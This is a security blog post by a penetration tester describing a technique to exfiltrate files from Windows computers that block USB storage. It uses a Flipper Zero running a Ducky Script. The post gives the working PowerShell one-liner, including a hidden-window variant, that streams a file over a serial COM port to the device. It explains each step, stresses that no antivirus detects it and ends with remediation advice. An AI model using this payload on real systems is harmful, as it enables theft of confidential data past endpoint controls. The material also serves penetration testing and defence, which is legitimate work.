Author: Danilo Erazo

I was approached to conduct on-site wifi hacking and penetration testing, including executing local data exfiltration on secured computers that block the use of USB storage devices. To address this challenge, I researched methods for exfiltrating data from such protected systems. As a result, I developed a Ducky Script that leverages PowerShell to exfiltrate files via a serial port using powershell. At the end, I was able to exfiltrate a big confidential file with country IDs, names, credit cards numbers, address, mobile telephone numbers and more. This is a new technique I discovered, and I will demonstrate it in this post. Additionally, no AV has detected it at any point.
1) Requirements:
- Flipper Zero.
- Victim Windows Computer: Tested on Windows 10 and 11.
- Powershell enabled on victim computer.
- File to exfiltrate: At the moment only txt files (you can paste whatever content in a txt file).
2) Theory:
In general, companies set USB storage restrictions using a GPO on all Windows computers, for example, with this configuration.:

Serial Device Classification:
- The Flipper Zero, when in serial mode, registers as a USB virtual COM port and not as a mass storage device. USB storage restrictions (policies or group settings) typically apply to devices classified under the mass storage device class (USB class code
08
) but not to serial ports. - As a serial port device, the Flipper bypasses policies that block USB drives.
Direct Data Transmission:
- Instead of relying on traditional filesystem-based access (as would happen with USB mass storage), the script uses the serial communication channel to transfer the file’s raw content directly to the Flipper.
- This is fundamentally different from how USB storage devices operate, as it does not involve mounting a filesystem.
Serial Ports Are Typically Trusted:
- Most systems, even those with strict USB storage restrictions, do not block or monitor serial ports because:
- They are often used for legitimate debugging, IoT, or device communication purposes.
- Blocking them could disrupt critical workflows.
Custom Command Protocol:
- The
storage write
command sent to the Flipper is part of its internal command interpreter. This allows the script to directly instruct the Flipper to save the transmitted data to its SD card, bypassing any filesystem restrictions on the host computer.
KEY INSIGHTS:
- No Storage Driver Needed: The Flipper does not mount as a drive but communicates via serial commands. This avoids USB mass storage restrictions.
- Serial Devices Bypass Restrictions: The script leverages the fact that serial devices are not subject to USB storage control policies.
- Flipper’s Flexibility: The Flipper’s ability to switch between BadUSB (HID) and serial modes is key. Once out of HID mode, it acts as a serial device, which allows exfiltration without triggering USB storage policies.
3) Ducky script analysis
Principal part of the Ducky script:
ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($fileContent);$p.Write("$([char] 3)");$p.Close();break}Catch{If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID}){"BadUSB"}Else{"NoFZ";Start-Sleep 4};Start-Sleep 1}}
REM ## Shorter Version, without debug output, no 4 Sec delay, exits powershell upon completion (useful when using powershell -w h)
REM ALTSTRING 1..600|%{Try{$p=New-Object System.IO.Ports.SerialPort("COM$(((Get-PNPDevice -PresentOnly -Class 'Ports' -InstanceID 'USB\VID_0483&PID_5740*') -split "COM")[1][0])",115200,'None',8,'one');$p.open();$p.Write("storage write $SPATH `r`n");$p.Write($fileContent);$p.Write("$([char] 3)");$p.Close();break}Catch{Sleep 1}};exit
Detection of USB Device Mode:
- The script identifies whether the Flipper Zero is in BadUSB mode or has switched to another mode (serial device mode).
- The line:
If(Get-PNPDevice -PresentOnly|Where {$_.InstanceID -match $BHID})
Checks for a device matching the BadUSB VID (VID_046D
) and determines if the Flipper is still emulating a keyboard (HID mode).
Fallback to Serial Port Mode:
- If the Flipper is not in BadUSB mode, the script searches for a device with the serial mode VID and PID (
VID_0483
andPID_5740
):
COM$(((Get-PNPDevice -PresentOnly|Where{$_.InstanceID -match $SUSB -and $_.Class -eq "Ports"}) -split "COM")[1][0])
This retrieves the COM port where the Flipper Zero is registered.
Establishing a Serial Connection:
- The script opens a serial connection to the Flipper:
$p=New-Object System.IO.Ports.SerialPort("COM...",115200,'None',8,'one')
It configures the connection for 115200 baud rate with no parity, 8 data bits, and 1 stop bit (a common serial configuration).The use of System.IO.Ports.SerialPort
enables direct communication with the Flipper Zero as a serial device.
Sending Data Over Serial:
- After opening the serial connection (
$p.open()
), the script sends commands and file content:
$p.Write("storage write $SPATH `r`n")
$p.Write($fileContent)
$p.Write("$([char] 3)")
-
storage write $SPATH
: This command tells the Flipper to prepare for writing to its internal storage or SD card at the specified path.$fileContent
: The actual file data is streamed byte-by-byte over the serial connection.$([char] 3)
: This likely signals the end of the data transfer (Control-C or similar).
Loop and Retry:
- The
1..600
loop retries the process up to 600 times, checking if the Flipper is connected in serial mode (storage mode) and reattempting the transfer every second. If no Flipper is detected, it sleeps for 4 seconds before retrying.
4) Executing the attack
When you execute this attack no AV detect this!. Check the steps and the ducky script in my GitHub repository: exfiltrate-pc2flipper

You can watch the tutorial on my YouTube channel:
5) Remmediation
Organizations can take the following steps to block such mechanisms:
- Restrict Serial Devices: Use security policies to block unauthorized serial devices via their VID/PID or class.
- Monitor Serial Port Usage: Log and alert on suspicious serial port activity, such as the unexpected opening of a serial port.
- Disable Unnecessary USB Ports: Physically disable unused USB ports or configure the system to block unauthorized USB devices altogether.
- Endpoint Protection: Use tools that can detect abnormal usage of serial ports and alert on unusual PowerShell activities.
- Restrict PowerShell Usage: Implement PowerShell Constrained Language Mode or other restrictions to limit its ability to execute unauthorized scripts or disable Powershell.
Let me know anything and reverse everything!
My Telegram: @revers3everything